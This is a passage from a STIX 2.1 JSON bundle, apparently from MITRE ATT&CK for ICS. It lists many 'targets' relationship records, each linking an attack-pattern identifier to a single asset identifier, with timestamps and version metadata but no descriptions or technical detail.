"attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--108a9b41-51ad-457a-b913-0f02c683130e", "created": "2024-07-01T10:37:15.818235", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818237", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--76f717f8-d271-44a5-9619-9186d58fcb68", "created": "2024-07-01T10:37:15.818246", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818248", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b81b7bd-dfab-46ca-95af-ec255243f9d6", "created": "2024-07-01T10:37:15.818256", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818258", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--449625ab-bc57-49bf-890c-f9e0c310716c", "created": "2024-07-01T10:37:15.818266", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818268", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--418b2e02-3f23-4d77-a4a8-ece00a4e9833", "created": "2024-07-01T10:37:15.818277", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818279", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6a56cda6-d65e-4004-a205-5105b82527d9", "created": "2024-07-01T10:37:15.818287", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818289", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--148ec03b-c3db-4194-9d91-fac270078faa", "created": "2024-07-01T10:37:15.818298", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818300", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--35e74a48-b804-465b-ae9a-fcf1e2924f55", "created": "2024-07-01T10:37:15.818308", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818310", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--53f42879-817b-49f1-a1a0-5962ddb135eb", "created": "2024-07-01T10:37:15.818318", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818320", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8121996-6c0c-4918-8131-3c44b90f69c5", "created": "2024-07-01T10:37:15.818328", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818330", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--433676eb-8f96-4c6b-b780-3f6fef661377", "created": "2024-07-01T10:37:15.818338", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818340", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--079def41-7b7d-4041-9d42-aa2466418c2e", "created": "2024-07-01T10:37:15.818349", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818351", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07858cf4-3305-46c2-a574-43ff661b9d9f", "created": "2024-07-01T10:37:15.818359", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818361", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5cd14704-280a-421f-9295-7797f6bd313a", "created": "2024-07-01T10:37:15.818369", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818372", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--57324a4f-a962-4dd7-b511-6984e51bf704", "created": "2024-07-01T10:37:15.818380", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818382", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7ce36e79-8680-4587-9258-97c2315d8284", "created": "2024-07-01T10:37:15.818390", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818392", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--35d9683b-024b-4702-92cd-9a89b3f7d1b5", "created": "2024-07-01T10:37:15.818400", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818402", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7bda6b81-b77e-4b83-8ed4-d7a67c6625f3", "created": "2024-07-01T10:37:15.818410", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818412", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1c52d9a5-397c-41d9-98fb-2139c1d338c2", "created": "2024-07-01T10:37:15.818420", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818423", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eb705407-0f1d-4711-8529-de6fd250dae8", "created": "2024-07-01T10:37:15.818431", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818433", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--76d9883c-9452-41c7-8ff9-ed25013fd483", "created": "2024-07-01T10:37:15.818441", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818444", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7ce56d2c-da02-4347-b61c-20eaa5cf62ba", "created": "2024-07-01T10:37:15.818452", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818454", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c2d54bce-7d56-4b61-9aa8-91dd264e48d6", "created": "2024-07-01T10:37:15.818462", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818464", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--37d61a5d-6096-4cbd-b88d-4a8e750760d6", "created": "2024-07-01T10:37:15.818472", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818474", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a8cfc2f7-18af-4dd9-bc48-bedc0e57eda7", "created": "2024-07-01T10:37:15.818482", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818484", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--53a12606-1409-4627-b181-1a2c75c43fdf", "created": "2024-07-01T10:37:15.818492", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818494", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--13189bfa-41b6-43ed-a514-c54a1d599171", "created": "2024-07-01T10:37:15.818502", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818504", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7527c517-1aef-4d32-aa56-a8c2118dbba2", "created": "2024-07-01T10:37:15.818513", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818515", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--73504692-db2e-4236-b158-3b03b359c4a1", "created": "2024-07-01T10:37:15.818523", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818525", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--931336f2-231d-49e1-84dd-5fa00108306b", "created": "2024-07-01T10:37:15.818533", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818535", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--38e97cf0-668b-4404-8cd4-a2fca3b58ae1", "created": "2024-07-01T10:37:15.818543", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818545", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a53d7528-6a5a-41e4-8c73-e528e9f02cc3", "created": "2024-07-01T10:37:15.818553", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818556", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0351e0c6-5ff9-4900-8134-5b1c0ce6f411", "created": "2024-07-01T10:37:15.818564", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818566", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--38e809a6-9077-4cb6-af4b-317f7ce83e01", "created": "2024-07-01T10:37:15.818574", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818576", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78445787-8814-4be3-99ca-edb8a252fdf2", "created": "2024-07-01T10:37:15.818584", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818587", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--583294fc-9642-40cc-8119-c2638db0b2c2", "created": "2024-07-01T10:37:15.818595", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818597", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--67778de0-c0c7-45f8-bc7b-d5b7659d5a91", "created": "2024-07-01T10:37:15.818606", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818608", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ca6b6383-35e8-4820-ad72-b0a769d7a887", "created": "2024-07-01T10:37:15.818616", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818618", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--89b71247-319d-4597-8357-d6007fda28d1", "created": "2024-07-01T10:37:15.818626", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818628", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c62354d5-8b79-4a92-9fd2-00951965658a", "created": "2024-07-01T10:37:15.818637", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818639", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1287ddf6-790c-40dd-a3fa-c59ddb15c1e3", "created": "2024-07-01T10:37:15.818647", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.818649", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", "target_ref": 